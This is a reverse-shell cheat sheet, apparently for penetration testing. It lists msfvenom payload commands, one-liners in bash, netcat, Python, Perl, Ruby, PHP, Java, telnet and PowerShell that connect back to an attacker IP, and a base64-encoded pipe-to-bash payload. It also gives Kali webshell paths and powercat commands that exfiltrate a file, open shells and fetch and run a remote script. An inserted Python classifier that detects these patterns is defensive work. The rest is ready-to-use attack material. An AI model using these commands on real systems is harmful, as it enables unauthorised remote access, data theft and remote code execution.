Reverse shells

Collection of Revshells in different flavors | Kali $IP 10.10.10.10 | Target $IP 11.11.11.11

#msfvenom

#Windows .asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f asp > shell.asp

#Windows x64 Arch
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f asp > shell.asp

#JSP / Tomcat WAR 
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f war > java4444.war  
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=4448 -f raw > w4448.jsp 


#php
msfvenom -p php/reverse_php LHOST=10.10.10.10 LPORT=1234 -f raw > shell.php


#binaries

Staged
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f elf > shell.elf 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f asp > shell.asp


Unstaged
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=8080 -f elf > shell.elf
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f asp > shell.asp

#Revshell piped in bash

1) Encode the payload in base64


echo 'nc -e /bin/bash 192.168.101.160 4444' | base64

bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMTAxLjE2MCA0NDQ0Cg==


2) Payload:

echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMTAxLjE2MCA0NDQ0Cg== | base64 -d | bash


3) Catch the revshell

nc -nvlp 4444

#bash

bash -i >& /dev/tcp/10.10.10.1/4444 0>&1  

mknod backpipe p && nc 10.10.10.1 4445 0<backpipe | /bin/bash 1>backpipe 

mkfifo /tmp/f2;cat /tmp/f2|/bin/sh -i |nc 10.10.10.1 4444 >/tmp/f2 

#php

php -r '$sock=fsockopen("10.10.10.10",4446);exec("/bin/sh -i <&3 >&3 2>&3");' 

#Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

#Perl

perl -e 'use Socket;$i="10.10.10.10";$p=4446;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

#ruby

ruby -rsocket -e 'f=TCPSocket.open("10.10.10.10",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

#java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

#Telnet

rm -f /tmp/p; mknod /tmp/p p && telnet 10.10.10.10 80 0</tmp/p | /bin/sh 1>/tmp/p

#Kali Webshells

Kali PHP reverse shells and command shells:
/usr/share/webshells/php/php-reverse-shell.php  #first love
/usr/share/webshells/php/php-findsock-shell.php
/usr/share/webshells/php/findsock.c
/usr/share/webshells/php/simple-backdoor.php
/usr/share/webshells/php/php-backdoor.php

Kali Perl Reverse Shell
/usr/share/webshells/perl/perl-reverse-shell.pl
/usr/share/webshells/perl/perlcmd.cgi

Kali Cold Fusion Shell
/usr/share/webshells/cfm/cfexec.cfm

Kali ASP Shell
/usr/share/webshells/asp/

Kali JSP Reverse Shell
/usr/share/webshells/jsp/jsp-reverse.jsp

#Powershell Reverse shell

Kali: nc -nvlp 443

Windows target:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close()"

#Powershell bind shell

Kali: nc -nv 10.11.0.22 443

Windows target, start a powershell listener:

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes =0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
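Added defender-side example, not part of the original cheat sheet: a small command-line classifier that flags the Unix one-liners above (bash /dev/tcp, nc -e, mkfifo/mknod pipes, the python/perl/ruby/php variants) and the PowerShell TcpClient/TcpListener + iex pattern, and that decodes long base64 tokens so the "echo <b64> | base64 -d | bash" variant is caught by its decoded content rather than missed. Pattern names and the sample command lines are constructed for illustration.

```python
import base64
import re

# Indicator regexes for the shell one-liners collected on this page, applied to a
# process command line (auditd execve records, EDR telemetry, shell history).
PATTERNS = [
    ("bash_dev_tcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("nc_exec", re.compile(r"\bnc(?:at)?\b.*\s-e\s+/bin/(?:ba)?sh")),
    # mkfifo/mknod followed (anywhere) by a pipe and by nc/ncat/telnet: the named-pipe variants
    ("fifo_named_pipe_shell", re.compile(r"\b(?:mkfifo|mknod)\b(?=.*\|)(?=.*\b(?:nc|ncat|telnet)\b)")),
    ("py_dup2_shell", re.compile(r"socket\.socket\(.*dup2\(.*subprocess")),
    ("perl_socket_exec", re.compile(r"use Socket;.*exec\(")),
    ("ruby_tcpsocket_exec", re.compile(r"TCPSocket\.open\(.*\bexec\b")),
    ("php_fsockopen_exec", re.compile(r"fsockopen\(.*exec\(")),
    ("ps_tcpclient_iex", re.compile(r"Net\.Sockets\.Tcp(?:Client|Listener).*\biex\b", re.I)),
    ("powercat_exec", re.compile(r"\bpowercat\b.*\s-e\s+\S+", re.I)),
    ("decoded_pipe_to_shell", re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b")),
]
# Long base64-looking tokens are decoded and re-scanned so the encoded variant is not missed.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def decoded_fragments(cmdline):
    """Yield the text of every token in cmdline that decodes as valid base64 UTF-8."""
    for tok in B64_TOKEN.findall(cmdline):
        try:
            yield base64.b64decode(tok, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue

def classify(cmdline):
    """Sorted indicator names firing on cmdline; '@b64' marks hits inside a decoded payload."""
    hits = {name for name, rx in PATTERNS if rx.search(cmdline)}
    for frag in decoded_fragments(cmdline):
        hits.update(name + "@b64" for name, rx in PATTERNS if rx.search(frag))
    return sorted(hits)

# Constructed sample command lines (not real telemetry) mirroring the page's one-liners.
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/10.10.10.1/4444 0>&1",
    "echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMTAxLjE2MCA0NDQ0Cg==| base64 -d | bash",
    "mkfifo /tmp/f2;cat /tmp/f2|/bin/sh -i |nc 10.10.10.1 4444 >/tmp/f2",
    "tar -czf backup.tar.gz /var/www",
]

def scan(cmdlines):
    """Map each command line to its indicators; lines with no hits are omitted."""
    return {c: h for c in cmdlines if (h := classify(c))}

if __name__ == "__main__":
    print(scan(SAMPLE_CMDLINES))
```

The base64 sample decodes to the page's own "nc -e /bin/bash ..." payload, which is why it reports nc_exec@b64 in addition to the pipe-to-shell indicator.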

#Powercat

# install with: apt install powercat
#Default location:/usr/share/windows-resources/powercat
#Transfer powershell script to target or download with:

iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

#Powercat file transfer
Kali: nc -nvlp 443
Windows: powercat -c 10.10.10.10 -p 443 -i C:\Users\Redcliff\important.txt

#Powercat reverse shell
Kali: nc -nvlp 443
Windows: powercat -c 10.10.10.10 -p 443 -e cmd.exe

#Powercat bind shell
Kali: nc 11.11.11.11 443
Windows: powercat -l -p 443 -e cmd.exe

#Powercat standalone payload (Base64 encoded)
Windows: powercat -c 10.10.10.10 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1

Then: paste the entire encoded string after the -E flag
powershell.exe -E ZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFMAZQB0AHUAcAAKAHsACgAKACAAIAAgACAAcABhAHIAYQBtACgAJABGAHUAbgBjAFMAZQB0AHUAcABWAGEAcgBzACkACgAgACAAIAAgACQAYwAsACQAbAAsACQAcAAsACQAdAAgAD0AIAAkAEYAdQBuAGMAUwBlAHQAdQBwAFYAYQByAHMACgAg........

Kali: nc -nvlp 443
